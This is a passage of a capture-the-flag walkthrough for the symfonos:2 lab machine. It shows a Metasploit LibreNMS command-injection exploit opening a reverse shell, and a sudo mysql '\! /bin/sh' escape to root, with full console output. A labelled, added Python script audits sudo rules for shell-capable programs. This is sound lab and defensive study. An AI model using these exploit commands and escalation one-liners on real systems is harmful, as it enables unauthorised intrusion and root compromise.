msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set RHOSTS localhost
RHOSTS => localhost
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set RPORT 8080
RPORT => 8080
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set USERNAME aeolus
USERNAME => aeolus
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set PASSWORD sergioteamo
PASSWORD => sergioteamo
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set LHOST eth0
LHOST => eth0
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > show options

Module options (exploit/linux/http/librenms_addhost_cmd_inject):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   sergioteamo      yes       Password for LibreNMS
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     localhost        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base LibreNMS path
   USERNAME   aeolus           yes       User name for LibreNMS
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  eth0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit
[*] Exploiting target 0.0.0.1

[*] Started reverse TCP double handler on 192.168.127.129:4444
[-] Exploit aborted due to failure: not-found: Failed to access the login page
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP double handler on 192.168.127.129:4444
[*] Successfully logged into LibreNMS. Storing credentials...
[+] Successfully added device with hostname HPIRTAMeLb
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname HPIRTAMeLb and id #1
[*] Command: echo YI1K6R7cEO7FDMk4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "YI1K6R7cEO7FDMk4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.127.129:4444 -> 192.168.127.128:34370) at 2019-10-06 18:27:01 -0400
[*] Session 1 created in the background.
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > sessions -i 1
[*] Starting interaction with 1...

python -c 'import pty;pty.spawn("/bin/bash")'
cronus@symfonos2:/opt/librenms/html$ export TERM=screen
export TERM=screen
cronus@symfonos2:/opt/librenms/html$ whoami
whoami
cronus
cronus@symfonos2:/opt/librenms/html$

Success! I’ve managed to exploit the service, get a session, create a pseudo-TTY session via Python, and now I see I’m logged in as the cronus user!

Get The Flag

I’ll just do a quick sudo -l check to see if my new user can give me any privileged access:

cronus@symfonos2:/opt/librenms/html$ sudo -l
sudo -l
Matching Defaults entries for cronus on symfonos2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql

Perfect, I can run mysql via sudo without a password. According to GTFOBins, I can get myself a nice shell with a one-liner:

cronus@symfonos2:/opt/librenms/html$ sudo /usr/bin/mysql -e '\! /bin/sh'
sudo /usr/bin/mysql -e '\! /bin/sh'
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
proof.txt
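As an added example that is not from the original walkthrough, here is a Python audit that parses either sudoers lines or sudo -l output and flags root rules for programs whose ordinary features can launch a shell, the mysql \! escape used above being the case at hand. The sample input is the sudo -l output shown above plus two constructed sudoers lines; the list of shell-capable programs is an assumption.

```python
"""Audit sudo rules (sudoers lines or `sudo -l` output) for root access via shell-capable programs."""
import os
import re

# Programs whose documented features run arbitrary commands, e.g. mysql's "\!" escape (assumption).
SHELL_CAPABLE = {"mysql", "vi", "vim", "less", "more", "find", "awk",
                 "python", "python3", "perl", "bash", "sh"}

# `sudo -l` prints "User cronus may run the following commands on symfonos2:" before its rules.
HEADER_RE = re.compile(r"^User (?P<who>\S+) may run the following commands")
# A rule: optional "user HOST=" prefix (sudoers form), "(runas)", optional tags, then commands.
RULE_RE = re.compile(
    r"^\s*(?:(?P<who>\S+)\s+\S+=)?\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_rules(text):
    """Return (who, runas_user, nopasswd, command) for every command in every rule."""
    rules, current = [], None
    for line in text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            current = h["who"]
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        who = m["who"] or current
        runas = m["runas"].split(":")[0].strip()          # "(root)" or "(root:root)"
        nopasswd = "NOPASSWD" in m["tags"].upper()
        for cmd in m["cmds"].split(","):
            rules.append((who, runas, nopasswd, cmd.strip()))
    return rules


def audit(text, shell_capable=SHELL_CAPABLE):
    """Return (severity, who, command, reason) for rules that hand out a root shell."""
    findings = []
    for who, runas, nopasswd, cmd in parse_rules(text):
        if runas not in ("root", "ALL"):
            continue
        prog = os.path.basename(cmd.split()[0])
        if cmd == "ALL":
            findings.append(("high", who, cmd, "unrestricted root"))
        elif prog in shell_capable:
            how = "without a password" if nopasswd else "with the user's password"
            findings.append(("high" if nopasswd else "medium", who, cmd,
                             f"{prog} can spawn a shell as root {how}"))
    return findings


# Constructed input: the `sudo -l` output shown above plus two sudoers-style lines.
SAMPLE = """\
Matching Defaults entries for cronus on symfonos2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql
aeolus ALL=(root) /usr/bin/systemctl restart proftpd
deploy ALL=(root) NOPASSWD: /usr/bin/vim /etc/motd
"""

if __name__ == "__main__":
    for sev, who, cmd, why in audit(SAMPLE):
        print(f"[{sev}] {who}: {cmd} -- {why}")
```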

The only thing left is to grab the flag:

# cat proof.txt
cat proof.txt

        Congrats on rooting symfonos:2!

           ,   ,
         ,-`{-`/
      ,-~ , \ {-~~-,
    ,~  ,   ,`,-~~-,`,
  ,`   ,   { {      } }                                             }/
 ;     ,--/`\ \    / /                                     }/      /,/
;  ,-./      \ \  { {  (                                  /,;    ,/ ,/
; /   `       } } `, `-`-.___                            / `,  ,/  `,/
 \|         ,`,`    `~.___,---}                         / ,`,,/  ,`,;
  `        { {                                     __  /  ,`/   ,`,;
        /   \ \                                 _,`, `{  `,{   `,`;`
       {     } }       /~\         .-:::-.     (--,   ;\ `,}  `,`;
       \\._./ /      /` , \      ,:::::::::,     `~;   \},/  `,`;     ,-=-
        `-..-`      /. `  .\_   ;:::::::::::;  __,{     `/  `,`;     {
                   / , ~ . ^ `~`\:::::::::::<<~>-,,`,    `-,  ``,_    }
                /~~ . `  . ~  , .`~~\:::::::;    _-~  ;__,        `,-`
       /`\    /~,  . ~ , '  `  ,  .` \::::;`   <<<~```   ``-,,__   ;
      /` .`\ /` .  ^  ,  ~  ,  . ` . ~\~                       \\, `,__
     / ` , ,`\.  ` ~  ,  ^ ,  `  ~ . . ``~~~`,                   `-`--, \
    / , ~ . ~ \ , ` .  ^  `  , . ^   .   , ` .`-,___,---,__            ``
  /` ` . ~ . ` `\ `  ~  ,  .  ,  `  ,  . ~  ^  ,  .  ~  , .`~---,___
/` . `  ,  . ~ , \  `  ~  ,  .  ^  ,  ~  .  `  ,  ~  .  ^  ,  ~  .  `-,

        Contact me via Twitter @zayotic to give feedback!

Fin.
